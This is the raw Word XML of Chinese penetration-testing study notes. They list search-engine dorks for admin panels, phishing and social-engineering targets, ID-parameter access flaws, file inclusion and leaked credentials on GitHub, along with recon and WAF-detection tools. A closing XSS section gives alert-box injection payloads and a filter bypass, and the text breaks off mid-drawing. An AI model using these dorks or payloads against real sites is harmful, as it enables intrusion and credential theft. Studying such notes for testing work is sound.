    <w:p w14:paraId="7D8F1EE9" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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测试环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1CF45" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx inurl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ ceshi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899895F" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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t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xxx.xxx intitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7537CC5D" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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邮箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ QQ /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7F73B" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>邮件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电子邮件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC47E8E" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx qq /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>群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企鹅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腾讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337EB9F" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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其他</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03570B08" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx inurl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api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4EE455" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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sit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xxx.xxx inurl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uid = / id =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A7416" w14:textId="15B7AC65" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>标题：索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D6BA5" w14:textId="14F76153" w:rsidR="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A4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</w:p>
    <w:p w14:paraId="0686225F" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing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56A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后台：site:xxx.xxx admin|login|system|管理|登录|内部|系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E140C5" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A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56A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>钓鱼：site:xxx.xxx 邮件|email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767EB07C" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A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56A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>社工：site:xxx.xxx qq|群|微信|腾讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75458CF7" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A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56A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>越权：site:xxx.xxx inurl:uid=1|userid=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DCCC1" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"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56A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包含：site:xxx.xxx inurl:php?include=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D7275" w14:textId="77777777" w:rsidR="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A4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</w:p>
    <w:p w14:paraId="3E64365A" w14:textId="77777777"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ithub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585E3AD" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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@ xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>密码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秘密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凭证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令牌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配置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通过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登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ ftp / pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C3A8B" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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@ xxx.xxx security_credentials / connetionstring / JDBC / ssh2_auth_password / send_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEA00A" w14:textId="77777777"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网盘引擎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE8CA7" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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盘多多：</w:t>
      </w:r>
      <w:hyperlink r:id="rId54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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.panduoduo.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0256C787" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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凌风搜索：</w:t>
      </w:r>
      <w:hyperlink r:id="rId56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www.lingfengyun.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（下载近似）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563125E3" w14:textId="77777777"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其他搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368756E0" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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莎顿：</w:t>
      </w:r>
      <w:hyperlink r:id="rId57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www.shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C9EF4" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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ZoomEye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId58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www.zoomeye.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AA65F" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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OFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId59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fofa.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D590A" w14:textId="77777777"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历史突破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DA15D" w14:textId="77777777"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乌云名义：</w:t>
      </w:r>
      <w:hyperlink r:id="rId60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shuimugan.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D42042" w14:textId="77777777"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ebug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId61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www.seebug.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E67C04" w14:textId="77777777"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漏洞利用数据库：</w:t>
      </w:r>
      <w:hyperlink r:id="rId62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63" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="693058A1" w14:textId="77777777"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Vulners</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId64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vulners.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4F4A6" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1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信息深度搜集：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA6E2D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指纹识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091A784" w14:textId="77777777"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火狐插件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED42D66" w14:textId="77777777"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云悉：</w:t>
      </w:r>
      <w:hyperlink r:id="rId65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//www.yunsee.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE6F9A" w14:textId="77777777"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web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId66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www.whatweb.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C6713" w14:textId="77777777"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：</w:t>
      </w:r>
      <w:hyperlink r:id="rId67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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//whatweb.bugscaner.com/look</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55BB0EC1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目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431ED90" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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御剑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7372ED" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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7kbscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId69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70" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/7kbstorm/7kbscan-WebPathBrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A0C97C3" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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irsearch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId71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72" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/maurosoria/dirsearch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2026C705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接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADC09E" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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Finder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId73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74" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Threezh1/JSFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46C330E9" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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链接查找器：</w:t>
      </w:r>
      <w:hyperlink r:id="rId75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76" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/GerbenJavado/LinkFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4938275F" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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搜索关键接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B415B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配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416EB5F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方法：</w:t>
      </w:r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获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E504E89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ttp.get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1D25B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方法：</w:t>
      </w:r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发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FDF2D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ttp.post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E318D53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$ .ajax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E078A08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服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>.httppost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02474FDE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服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>.httpget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFADFA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F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51F763" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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fw00f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId77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78" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/EnableSecurity/wafw00f</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="198C57D7" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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WhatWaf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId79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80" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Ekultek/WhatWaf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38129741" w14:textId="77777777" w:rsidR="00F76936" w:rsidRPr="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936"/>
    <w:p w14:paraId="3C416707" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRPr="000D5101" w:rsidRDefault="000D5101" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="000D5101">
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A4193" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A" w:rsidRDefault="00CB3A3A" w:rsidP="00CB3A3A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CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>"&gt;&lt;script&gt;alert('hack')&lt;/script&gt;&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52698F" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3：</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CD82CE0" wp14:editId="6C3E7599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38227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8A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A448A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA885E3" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3A"/>
    <w:p w14:paraId="5E2547E1" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>onclick=</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00CB3A3A" w:rsidRPr="00CB3A3A">
        <w:t>alert(/xss/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57436A96" w14:textId="77777777" w:rsidR="00CB3A3A" w:rsidRDefault="00CB3A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="333261D3" wp14:editId="2EDF9D37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4105275" cy="49530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4F3">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onmouseover=</w:t>
      </w:r>
      <w:r w:rsidR="00C804F3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert(/xss/)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标要碰才会触发</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这种绕过主要是加多一个引号和绕过&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CF341" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="18ECDAA2" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="518C4068" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="0C8FC188" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="02003987" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABAF95" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="1E7BC22C" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="539F1E59" wp14:editId="1A5C0E3B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25532</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4391025" cy="39052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4D0B4" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="5B573E24" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="3CF7C01F" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="07924553" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00C804F3">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>onclick=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:t>alert(/xss/)</w:t>
      </w:r>
      <w:r w:rsidR="00456CC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
